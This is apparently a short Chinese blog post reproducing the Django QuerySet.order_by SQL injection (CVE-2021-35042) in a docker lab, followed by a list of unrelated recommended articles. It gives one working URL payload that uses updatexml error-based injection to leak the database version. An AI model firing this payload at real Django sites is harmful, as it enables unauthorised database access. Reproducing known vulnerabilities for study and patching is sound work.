漏洞描述
Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。
参考链接:
该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。
漏洞环境及利用
搭建docker环境
payload
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23
Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)
blackK_YC2023-11-26 19:09
相关推荐
双力臂40410 小时前
MyBatis动态SQL进阶:复杂查询与性能优化实战小石潭记丶10 小时前
Django服务开发镜像构建A__tao11 小时前
一键将 SQL 转为 Java 实体类,全面支持 MySQL / PostgreSQL / Oracle!A__tao12 小时前
SQL 转 Java 实体类工具华子w90892585914 小时前
基于 Python Django 和 Spark 的电力能耗数据分析系统设计与实现7000字论文实现羊小猪~~18 小时前
数据库学习笔记(十七)--触发器的使用liulun19 小时前
在浏览器中使用SQLite(官方sqlite3.wasm)先睡1 天前
优化MySQL查询